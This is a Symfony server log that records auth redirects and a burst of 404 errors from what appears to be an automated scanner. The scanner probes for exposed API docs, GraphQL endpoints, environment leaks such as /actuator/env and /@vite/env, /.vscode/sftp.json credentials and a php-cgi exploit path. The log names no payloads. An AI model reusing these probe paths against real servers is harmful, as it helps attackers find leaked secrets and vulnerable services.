[2025-12-19 09:44:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:44:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:44:14] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:44:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 09:44:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:44:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:44:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:44:14] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:21] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 09:44:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 09:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
